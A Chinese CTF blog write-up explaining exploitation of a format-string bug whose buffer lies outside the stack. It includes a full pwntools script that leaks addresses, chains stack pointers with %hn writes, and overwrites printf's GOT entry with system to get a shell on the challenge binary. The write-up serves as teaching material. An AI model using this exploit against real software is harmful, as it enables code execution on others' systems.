非栈上的格式化字符串利用例题讲解

最新推荐文章于 2024-08-22 10:56:53 发布
最新推荐文章于 2024-08-22 10:56:53 发布
阅读量753 收藏 2
点赞数 5
分类专栏: pwn 文章标签: 算法 c++ 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fzucaicai/article/details/129361447
版权
文章详细介绍了如何在一个存在格式化字符串漏洞但buf变量不在栈上的环境中,通过%n和%s特性,利用三连指针技巧将printf的got表地址分步写入栈中,然后一次性修改got表内容为system函数地址,以实现系统的控制权获取。
摘要由CSDN通过智能技术生成

题目自取:

链接:https://pan.baidu.com/s/1te_oc3GuWTlDDS5q-NhtKQ?pwd=cjz9 
提取码:cjz9

开始:

一个非常明显的格式化字符串漏洞,但是值得注意的是,此时的buf变量不在栈上因此我们之前把printf的got表拿到栈上进行公开处刑,改掉got的值为system函数将无法实现

那么我们要如何才能改掉printf的got表为system函数呢?
这里将要介绍一种方法叫做 ‘一键三连’(我编的,暗示点赞)

 就像这样,明明输入了aaaaaaaa,但是栈上仍然无踪迹可寻。 

找到三连,借助连续指针修改栈上数据: 

比如现在我们想把printf的got表拿到栈上,这时候因为数据是写在bss段的,因此没有办法直接把它们写在栈上。但是有了三连指针,我们就可以完成这个看上去不可能完成的任务。

首先我们要了解一下%n 和 %s 的特点: 
%n 和 %s一样,都是类似于指针的东西,比如我对第7个参数进行%n ,那么实际上修改的并不是第七个参数里的数据,而是把第七个参数里存的数据当成一个指针,然后修改指针指向的对应内容,就理解为比%p %x这样的格式化字符再更深入一层

这也就是为什么我们不能直接修改第七个参数所储存的内容的原因。
但是现在有了三连指针,我们就可以找个类似中介的东西,去替代修改,这就是三连指针的用处。

具体来说,就是用%n,把如图的0x7fffffffdda0所指向的0x7fffffffddb0改成0xfffffffdd98,这样的话,我们用%n作用在第八个参数就可以修改第七个参数所储存的内容了!

因为我们一次修改只能修改2个字节的东西(%hn),而地址有16位,因此我们需要分四次将printf的got表拿到栈上。这里随便给个修改的代码举个例子:
 

nu_1 = stack_1 & 0xffff
payload_1 = b"%" + str(nu_1).encode("utf-8") + b"c%6$hn\x00"
io.send( payload_1)
io.interactive()
printf_got_nu_1 = printf_got & 0xffff
payload_1 = b"%" + str(printf_got_nu_1).encode("utf-8") + b"c%8$hn\x00"
io.send(payload_1)
io.interactive()

nu_2 = stack_2 & 0xffff
payload_1 = b"%" + str(nu_2).encode("utf-8") + b"c%6$hn\x00"
io.send( payload_1)
io.interactive()
printf_got_nu_2 = (printf_got + 2) & 0xffff
payload_1 = b"%" + str(printf_got_nu_2).encode("utf-8") + b"c%8$hn\x00"
io.send( payload_1)
# duchao_pwn_script.dbg(io)
io.interactive()

nu_3 = stack_3 & 0xffff
payload_1 = b"%" + str(nu_3).encode("utf-8") + b"c%6$hn\x00"
io.send(payload_1)
# duchao_pwn_script.dbg(io)
io.interactive()
printf_got_nu_3 = (printf_got + 4) & 0xffff
payload_1 = b"%" + str(printf_got_nu_3).encode("utf-8") + b"c%8$hn\x00"
io.send( payload_1)
# duchao_pwn_script.dbg(io)
io.interactive()


nu_4 = stack_4 & 0xffff
payload_1 = b"%" + str(nu_4).encode("utf-8") + b"c%6$hn\x00"
io.send( payload_1)
io.interactive()
printf_got_nu_2 = (printf_got + 6)& 0xffff
payload_1 = b"%" + str(printf_got_nu_2).encode("utf-8") + b"c%8$hn\x00"
io.send( payload_1)
# duchao_pwn_script.dbg(io)
io.interactive()

 如此之后,我们就成功地把printf的got的地址分四次放在了栈上

 接下来就是把printf的got表的内容修改为system的地址就行
注意:
改got只能一次成型,因为如果分多次,导致printf的got表改变,就不会再执行pirntf函数了,因此需要一次性修改,否则将会失败。

sys_addr_1 = sys_addr & 0xffff
sys_addr_2 = (sys_addr >> 16)& 0xffff
sys_addr_3 = (sys_addr >> 32)& 0xffff
sys_addr_4 = (sys_addr >> 48)& 0xffff
payload = b"%" + str(sys_addr_1).encode("utf-8") +  b"c%7$hn" 
payload += b"%" + str(0x10000 + sys_addr_2 - sys_addr_1).encode("utf-8") + b"c%9$hn" 
payload += b"%" + str(0x10000 + sys_addr_3 - sys_addr_2).encode("utf-8") + b"c%15$hn"
payload += b"\x00"
io.send(payload)

最后将参数发送过去即可。
exp如下:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
import duchao_pwn_script
arch = 'amd64'
duchao_pwn_script.init_pwn_linux(arch)
pwnfile= './fmt_str_level_2_x64'
io = process(pwnfile)
#io = remote('', )
elf = ELF(pwnfile)
rop = ROP(pwnfile)
libc =elf.libc

# 泄露基地址,包含1.文件基地址,2.libc基地址
dem = 'hello\n'
io.recvuntil(dem)
payload4searchbase = b"%9$p\x00"
io.send(payload4searchbase)
main_28 = int(io.recv()[2:14],16)
file_base = main_28 -elf.symbols['main'] -  28
print("file_base is :",hex(file_base))
printf_got = file_base + elf.got["printf"]
payload4searchlibc = b"%11$p\x00"
io.send(payload4searchlibc)
libc_start_main_243 = int(io.recv()[2:14],16)
libc_base = libc_start_main_243 - libc.symbols['__libc_start_main'] -  243
print("libc_base is :",hex(libc_base))
sys_addr = libc_base + libc.symbols["system"]


# 泄露栈地址
payload_search_stack  = b'%6$p\x00'
io.send(payload_search_stack)
stack_offset_1 = -0x8
stack_offset_2 = 0x8
stack_offset_3 = 0x38
stack_offset_4 = 0x50
stack = int(io.recv()[2:14],16)
stack_1 = stack + stack_offset_1
stack_2 = stack + stack_offset_2
stack_3 = stack + stack_offset_3
stack_4 = stack + stack_offset_4


# 修改三链
nu_1 = stack_1 & 0xffff
payload_1 = b"%" + str(nu_1).encode("utf-8") + b"c%6$hn\x00"
io.send( payload_1)
io.interactive()
printf_got_nu_1 = printf_got & 0xffff
payload_1 = b"%" + str(printf_got_nu_1).encode("utf-8") + b"c%8$hn\x00"
io.send(payload_1)
io.interactive()

nu_2 = stack_2 & 0xffff
payload_1 = b"%" + str(nu_2).encode("utf-8") + b"c%6$hn\x00"
io.send( payload_1)
io.interactive()
printf_got_nu_2 = (printf_got + 2) & 0xffff
payload_1 = b"%" + str(printf_got_nu_2).encode("utf-8") + b"c%8$hn\x00"
io.send( payload_1)
# duchao_pwn_script.dbg(io)
io.interactive()

nu_3 = stack_3 & 0xffff
payload_1 = b"%" + str(nu_3).encode("utf-8") + b"c%6$hn\x00"
io.send(payload_1)
# duchao_pwn_script.dbg(io)
io.interactive()
printf_got_nu_3 = (printf_got + 4) & 0xffff
payload_1 = b"%" + str(printf_got_nu_3).encode("utf-8") + b"c%8$hn\x00"
io.send( payload_1)
# duchao_pwn_script.dbg(io)
io.interactive()


nu_4 = stack_4 & 0xffff
payload_1 = b"%" + str(nu_4).encode("utf-8") + b"c%6$hn\x00"
io.send( payload_1)
io.interactive()
printf_got_nu_2 = (printf_got + 6)& 0xffff
payload_1 = b"%" + str(printf_got_nu_2).encode("utf-8") + b"c%8$hn\x00"
io.send( payload_1)
# duchao_pwn_script.dbg(io)
io.interactive()


sys_addr_1 = sys_addr & 0xffff
sys_addr_2 = (sys_addr >> 16)& 0xffff
sys_addr_3 = (sys_addr >> 32)& 0xffff
sys_addr_4 = (sys_addr >> 48)& 0xffff
print("system is :",hex(sys_addr))
print("system_addr1 is :",hex(sys_addr_1))
print("system_addr2 is :",hex(sys_addr_2))
print("system_addr3 is :",hex(sys_addr_3))
print("system_addr4 is :",hex(sys_addr_4))
pause()


# 一次性修改got表项
payload = b"%" + str(sys_addr_1).encode("utf-8") +  b"c%7$hn" 
payload += b"%" + str(0x10000 + sys_addr_2 - sys_addr_1).encode("utf-8") + b"c%9$hn" 
payload += b"%" + str(0x10000 + sys_addr_3 - sys_addr_2).encode("utf-8") + b"c%15$hn"
payload += b"\x00"
io.send(payload)
io.interactive()

#发送/bin/sh
io.send( b'/bin/sh\x00')
io.interactive()

 

 

cccsl_
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【PWN系列】格式化字符串在bss段上的处理
Vicl1fe的博客
10-19 1473
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: http://www.starssgo.top/2019/12/06/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%9C%A8bss%E6%AE%B5%E7%9A%84%E5%A4%84%E7%90%86/ 第一次遇到这种题,想写wp记录一下,但确实不知道该怎么写才通俗易懂,最后还是感觉结合exp一步一步调试应该会更通俗易懂。 题目分析 开启
非栈上的格式化字符串漏洞利用
qq_52877079的博客
03-25 379
对于常规的栈上格式化字符串漏洞,可以直接构造(%c %n 指针)的方式来实现任意地址写,但是对于非栈上变量来说,就无法直接给出目的地址的指针,因为printf的参数保存在寄存器和栈上面。对于非栈上变量,格式化字符串漏洞依然存在,可以考虑借助已有的栈上指针来实现间接地利用
非栈上的格式化字符串漏洞
Grxer的博客
03-20 796
利用1处栈地址,也就是将0xffffcfa8地址处内容0xffffcfb8修改为0xffffcfac,由于开启pie保护,0xffffcfac处所存内容是elf文件所存地址+pie基址生成的,got表也在elf文件的数据区,也是有地址+pie基地址生成,所以我们只需要利用%$hn修改其低四位即可(小端序),buf地址可以利用%$p泄露,这样我们就可以输入buf为printf_got+payload,修改其got为system地址。(目标文件该节在磁盘不占空间,在运行时,内存分配,初始化0))
xman_2019_format(非栈格式化字符串仅一次利用的爆破)
m0_51251108的博客
11-10 657
xman_2019_format: 看名字是格式化字符串 checksec一下 在printf处 程序分析: 有个后门 想着就是把printf,劫持为后门
xman_2019_format(非栈格式化字符串仅一次利用的爆破)
seaaseesa的博客
04-30 1494
xman_2019_format 首先检查一下程序的保护机制 然后用IDA分析一下 存在一个后门函数 s执行的内存是非栈上,这类格式化字符串漏洞,一般需要先泄露栈地址,但是这里无法做到,如果泄露了,第二次也没机会来再次利用了。因为这里是一次输入,分步执行。没有循环的交互。因此,最简单的方法是爆破栈的低1字节。通过栈上已有的数据,在栈上布下一个指向函数返回地址栈的指针,然后劫持返回地...
BUU_SWPUCTF_2019_login非栈格式化字符串
qq_70452545的博客
04-21 235
对于栈上的格式化字符串可以通过直接将对应地址写入栈中,然后利用三链对任意写入地址修改,非栈上也就是不能直接写入,利用格式化字符串一样可以修改,只是要麻烦一点。
不满6位补零 字符串_非栈格式化字符串漏洞利用技巧
weixin_39617669的博客
12-25 264
0x00前言关于Linux栈上格式化字符串漏洞利用网上已经有许多讲解了,但是非栈上的格式化字符串漏洞很少有人介绍。这里主要以上周末SUCTF比赛中playfmt题目为例,详细介绍一下bss段上或堆上的格式化字符串利用技巧。0x01基础知识点格式化字符串漏洞的具体原理就不再详细叙述,这里主要简单介绍一下格式化参数位置的计算和漏洞利用时常用的格式字符。参数位置计算linux下32位程序是栈传参,从左...
PHP程序设计-3期(KC016) 2.8.11字符串格式化习题.doc
07-13
`printf` 函数需要格式字符串与对应的变量一一对应,如果参数列表中的变量数量少于格式化字符串中的占位符,编译器会报错。 3. 正确。`sprintf` 函数的返回值是一个字符串,它将所有参数按照指定的格式组合成一个...
Android中为字符串添加修饰的练习题实现提示与解决方案(共9张PPT).ppt
11-14
本文的练习题和解决方案涵盖了 Android 中的各种字符串修饰技术,包括如何使用 SpannableString 来格式化字符串,如何使用 Html.fromHtml() 方法来解析 HTML 字符串,如何使用 Android 的 LayoutParams 来设置控件的...
字符串习题总结.rar
01-10
6. **字符串格式化**:在输出字符串时插入变量值,如Python的f-string、C++的`printf`格式化或Java的`String.format()`。 7. **正则表达式**:用于匹配和处理复杂模式的字符串工具,如Python的`re`模块,提供了强大...
华为-华为od题库练习题之字符串分隔.zip
05-18
6. **字符串格式化**:如C++的`printf`,Python的`format`或f-string,Java的`String.format`。 7. **编码与解码**:理解ASCII、Unicode、UTF-8等编码方式,并能进行编码转换。 8. **字符串处理效率**:了解不同...
Android中为字符串添加修饰的练习题要求说明.pdf
07-10
然后,通过`TextView`的`setText()`方法,将格式化字符串设置为文本内容。注意,为了正确显示HTML标签,我们需要使用`Html.fromHtml()`或`HtmlCompat.fromHtml()`方法。 总结,本练习题主要涉及以下几个知识点: ...
非栈格式化字符串
Chuang__的博客
03-30 709
非栈格式化字符串,BeginCTF,Bad_cat_CTF 的两道例题
非栈格式化字符串漏洞
2302_79813730的博客
02-21 954
如图,红色框为a-b-c,我们可以利用格式化字符串漏洞更改c为蓝色框的第一个地址,这样我们就得到a-b-c-d,有这个我们一定可以找到b-c-d,这样我们就可以把d改成one_gadget的地址,d正好是main函数的返回地址,我们一般修改的也是这个。但这样实际是行不通的,通过调试我们可以看到三次更改的都是尾字节,为什么呢,原因就在于非栈上,每一次更改都要有对应的返回地址,这是第一次的,第二次要修改的是中间两字节,在原本基础上+2就可以了,第三次原理相似(想学堆上的可以自己去搜索,我目前也没学到。
手搓payload+非栈格式化字符串
2301_79880074的博客
02-22 1148
格式化字符串漏洞类型题中我们可以利用payload = fmtstr_payload(offset,{printf_got:system_plt})这个工具去修改地址,但是这个工具产生的字节数是很大的,有时候我们是无法去正常利用的,我们需要去自己构造payload修改地址。
[CTF]PWN--非栈格式化字符串漏洞
2301_79880752的博客
02-26 2132
一般来说,栈上的格式化字符串漏洞利用步骤是先泄露地址,包括ELF程序地址和libc地址;然后将需要改写的GOT表地址直接传到栈上,同时利用%c%n的方法改写入地址,最后就是劫持流程。但是对于BSS段或是堆上格式化字符串,也就是非栈格式化字符串漏洞,无法直接将想要改写的地址指针放置在栈上,也就没办法实现任意地址写。本文主要为大家介绍BSS段上的格式化字符串漏洞的解法。
格式化字符串在bss段上的处理
playmaker的博客
06-19 2634
格式化字符串在bss段上的内容处理 先查看程序保护,保护全开 拿到程序一眼就看到了格式化字符串漏洞 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [esp+0h] [ebp-10h] unsigned int v6; // [esp+4h]...
暑假集训——Hitcon_Trainning——lab9_playfmt——格式化字符串漏洞_字符串在bss段
qq_41667316的博客
07-13 737
格式化字符串漏洞 思路 一开始就是没有思路,太菜了,真的太菜了TAT。 这里的buf是在bss段,也就是意味着没有办法用常规方法做。 看了大佬的wp才知道可以控制ebp来实现地址任意写。 但是我觉得或许用栈迁移也可以试一下。 先写一波控制ebp! 控制ebp 首先,格式化字符串漏洞的两个利用方式 泄露栈上内容 改写某地址内容(前提是这个地址要在栈上,也就是printf可控的地方) 原理...
代码随想录算法训练营19-回溯1
最新发布
weixin_53416771的博客
08-22 280
画出来的树是这样记录所有组合,一个变量current装当前的处理结果,一个res装所有的处理的结果下面的代码还可以剪枝优化。
格式化字符串漏洞例题
08-23
格式化字符串漏洞是一种常见的安全漏洞,可以被恶意用户利用来读取内存中的敏感信息或执行任意代码。下面是一个格式化字符串漏洞的示例: ``` #include <stdio.h> int main() { char secret[] = "This is a secret message"; char input[100]; printf("请输入一个字符串:"); scanf("%s", input); printf(input); return 0; } ``` 在这个例子中,程序要求用户输入一个字符串,然后将该字符串作为格式化字符串传递给`printf`函数进行输出。然而,如果用户输入的字符串中包含格式化字符串的占位符(例如`%s`),`printf`函数会尝试解析并输出对应位置的参数。如果输入的字符串中包含了其他的格式化字符串,那么程序就有可能发生未定义的行为,比如读取内存中的敏感信息或执行任意代码。 为了修复这个漏洞,可以使用`printf`函数的格式化字符串参数来指定要输出的具体内容,而不是直接将用户的输入作为格式化字符串。例如,可以将`printf`函数的调用修改为`printf("%s", input);`,这样就可以确保`printf`函数只输出输入的字符串,而不会解析其中的格式化字符串。 总结来说,格式化字符串漏洞是一种安全漏洞,可以通过修改程序代码来避免。在处理用户输入时,应该谨慎使用格式化字符串函数,并确保只输出用户输入的内容,而不是直接将用户输入作为格式化字符串。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [MATLAB代码示例,用于将一个字符串添加到字符串数组的末尾(附详细步骤).txt](https://download.csdn.net/download/weixin_44609920/88239228)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [pwn 格式化字符串漏洞例题](https://blog.csdn.net/limenzzz/article/details/127016613)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值